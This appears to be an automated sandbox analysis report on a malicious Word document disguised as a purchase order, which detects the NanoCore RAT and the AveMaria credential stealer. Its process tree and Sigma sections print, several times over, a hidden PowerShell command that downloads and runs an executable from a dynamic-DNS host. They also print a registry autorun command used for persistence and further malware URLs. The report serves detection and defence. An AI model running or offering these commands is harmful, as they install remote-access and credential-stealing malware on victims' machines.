
Windows Analysis Report NEW PO1100372954 -.doc

Overview

General Information

Sample Name:NEW PO1100372954 -.doc
Analysis ID:457815
MD5:afe48e30fc3f12c2b6ad7d19ae1fff8e
SHA1:2ded99867d8b3e9499b10743ae732efec19ccc8e
SHA256:ecef57afce8a7d5eed2080401da0ce36d67c2493cf1385b432a6bf0a65f6e521
Tags:doc

Detection

NanoCore AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: NanoCore
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected AveMaria stealer
Yara detected Nanocore RAT
.NET source code contains very large strings
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Injects files into Windows application
Installs a global keyboard hook
Machine Learning detection for dropped file
Microsoft Office creates scripting files
Office process drops PE file
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create new users
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: PowerShell Download from URL
Sigma detected: Verclsid.exe Runs COM Object
Spawns drivers
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2604 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • powershell.exe (PID: 2396 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • FLTLDR.EXE (PID: 3048 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT MD5: AF5CCD95BAC7ADADD56DE185D7461B2C)
    • powershell.exe (PID: 1068 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • putty.exe (PID: 2952 cmdline: 'C:\Users\user\AppData\Roaming\putty.exe' MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
          • cmd.exe (PID: 2156 cmdline: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
            • reg.exe (PID: 2400 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: D69A9ABBB0D795F21995C2F48C1EB560)
          • images.exe (PID: 2168 cmdline: C:\ProgramData\images.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
            • images.exe (PID: 2820 cmdline: C:\ProgramData\images.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
              • cmd.exe (PID: 912 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
              • iBCrDCK.i.exe (PID: 2340 cmdline: 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
                • iBCrDCK.i.exe (PID: 2260 cmdline: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
                • iBCrDCK.i.exe (PID: 2428 cmdline: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
    • powershell.exe (PID: 3056 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • putty.exe (PID: 2948 cmdline: 'C:\Users\user\AppData\Roaming\putty.exe' MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 1492 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 2260 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 2428 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
    • verclsid.exe (PID: 1900 cmdline: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2416 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT' MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • drvinst.exe (PID: 1464 cmdline: DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600' MD5: 2DBA1472BDF847EAE358A4B9FA9AB0C1)
  • rdpdr.sys (PID: 4 cmdline: MD5: 1B6163C503398B23FF8B939C67747683)
  • tdtcp.sys (PID: 4 cmdline: MD5: 51C5ECEB1CDEE2468A1748BE550CFBC8)
  • tssecsrv.sys (PID: 4 cmdline: MD5: 19BEDA57F3E0A06B8D5EB6D619BD5624)
  • RDPWD.SYS (PID: 4 cmdline: MD5: FE571E088C2D83619D2D48D4E961BF41)
  • smtpsvc.exe (PID: 2964 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
    • smtpsvc.exe (PID: 764 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp | JoeSecurity_AveMaria | Yara detected AveMaria stealer | Joe Security
00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x5b0b:$x1: NanoCore.ClientPluginHost
  • 0x5b44:$x2: IClientNetworkHost
00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x5b0b:$x2: NanoCore.ClientPluginHost
  • 0x5c0f:$s4: PipeCreated
  • 0x5b25:$s5: IClientLoggingHost
00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x5b99:$x1: NanoCore.ClientPluginHost
  • 0x5bb3:$x2: IClientNetworkHost
(90 entries in total; only the first are shown here)

Unpacked PEs

Source | Rule | Description | Author | Strings
34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0x350b:$x2: NanoCore.ClientPluginHost
  • 0x52b6:$s4: PipeCreated
  • 0x34f8:$s5: IClientLoggingHost
34.2.iBCrDCK.i.exe.34ffadc.25.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth
  • 0xd9ad:$x1: NanoCore.ClientPluginHost
  • 0xd9da:$x2: IClientNetworkHost
34.2.iBCrDCK.i.exe.34ffadc.25.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xd9ad:$x2: NanoCore.ClientPluginHost
  • 0xea88:$s4: PipeCreated
  • 0xd9c7:$s5: IClientLoggingHost
34.2.iBCrDCK.i.exe.34ffadc.25.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
(140 entries in total; only the first are shown here)

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

E-Banking Fraud:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396
Sigma detected: PowerShell DownloadFile
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396
Sigma detected: Direct Autorun Keys Modification
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2156, ProcessCommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ProcessId: 2400
Sigma detected: Exploit for CVE-2017-0261
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine|base64offset|contains: , Image: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, NewProcessName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, OriginalFileName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, ProcessId: 3048
Sigma detected: PowerShell Download from URL
Source: Process started; Author: Florian Roth, oscd.community, Jonhnathan Ribeiro; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396
Sigma detected: Verclsid.exe Runs COM Object
Source: Process started; Author: Victor Sergeev, oscd.community; Data: Command: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 1900
Sigma detected: Group Modification Logging
Source: Event Logs; Author: Alexandr Yampolskyi, SOC Prime; Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-966771315-3019405637-367336477-1007, data 2: None, data 3: user-PC, data 4: S-1-5-21-966771315-3019405637-367336477-513, data 5: S-1-5-21-966771315-3019405637-367336477-1006, data 6: user, data 7: user-PC, data 8: 0x14825, data 9: -
Sigma detected: Local User Creation
Source: Event Logs; Author: Patrick Bareiss; Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: eC.vaAf, data 1: user-PC, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-966771315-3019405637-367336477-1007, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-966771315-3019405637-367336477-1006, data 4: user, data 5: user-PC, data 6: 0x14825, data 7: -, data 8: eC.vaAf, data 9: %%1793
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396

Data Obfuscation:

Sigma detected: Powershell download and execute file
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396

Stealing of Sensitive Information:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Remote Access Functionality:

Sigma detected: NanoCore
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://hutyrtit.ydns.eu/microC.exe; Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe; ReversingLabs: Detection: 19%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll; Metadefender: Detection: 20%
Source: C:\Program Files\Microsoft DN1\sqlmap.dll; ReversingLabs: Detection: 42%
Source: C:\ProgramData\images.exe; ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe; ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe; ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe; ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Roaming\putty.exe; ReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: NEW PO1100372954 -.doc; ReversingLabs: Detection: 23%
Yara detected AveMaria stealer
Source: Yara match; File source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
